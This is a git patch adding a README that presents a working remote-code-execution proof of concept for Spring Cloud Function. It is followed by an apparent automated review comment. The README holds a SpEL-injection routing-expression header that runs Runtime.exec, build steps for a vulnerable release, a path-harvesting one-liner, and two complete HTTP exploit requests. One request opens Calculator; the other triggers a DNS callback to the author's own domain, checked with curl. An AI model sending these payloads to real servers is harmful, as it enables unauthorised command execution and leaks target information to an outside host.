From eb33112b95062cfca5e4d9c39d517de852cebc0a Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Wed, 30 Mar 2022 11:47:47 +0800
Subject: [PATCH] add spring-cloud-function RCE EXP POC
---
.../Spring Cloud Function RCE/README.md | 71 +++++++++++++++++++
1 file changed, 71 insertions(+)
create mode 100644 21-Spring Cloud/Spring Cloud Function RCE/README.md
diff --git a/21-Spring Cloud/Spring Cloud Function RCE/README.md b/21-Spring Cloud/Spring Cloud Function RCE/README.md
new file mode 100644
index 0000000..ab0e208
--- /dev/null
+++ b/21-Spring Cloud/Spring Cloud Function RCE/README.md
@@ -0,0 +1,71 @@
+
+
+# spring-spel-0day-poc
+spring-cloud/spring-cloud-function RCE EXP POC
+https://github.com/spring-cloud/spring-cloud-function
+header
+```
+spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
+```
+# build
+```bash
+wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
+unzip v3.1.6.zip
+cd spring-cloud-function-3.1.6
+cd spring-cloud-function-samples/function-sample-pojo
+mvn package
+java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
+```
+
+
+# get path lists for test
+
+```bash
+find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'
+```
+```
+...
+functionRouter
+uppercase
+lowercase
+...
+```
+
+
+
+# poc1
+
+```
+POST /functionRouter HTTP/1.1
+host:127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+Connection: close
+spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
+Content-Length: 5
+
+helloexp
+```
+
+
+
+# poc2
+
+```
+POST /functionRouter HTTP/1.1
+host:127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+Connection: close
+spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.helloexp.com")
+Content-Length: 5
+
+helloexp
+```
+
+## check
+
+```bash
+curl -v 'https://helloexp.com/dnslog?q=random87535.rce.helloexp.com'
+```
+
+## official GitHub info
+https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
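Review bot: poc2 and the "check" step hard-code the author's own domain (`random87535.rce.helloexp.com` and `https://helloexp.com/dnslog?q=...`), so anyone following the README sends their test lookups and results to a third party they do not control. Replace both with a clearly marked placeholder for a callback domain the tester owns. The README also gives no affected or fixed version range and no mitigation. The only remediation pointer is the bare commit URL under "official GitHub info", and the build section pins `v3.1.6` without saying that this is the release being reproduced. Add a short section stating which releases include that commit and what users should upgrade to. Minor: the stray `header` line before the first code block should be a heading like the other sections, and the two leading blank lines can be dropped.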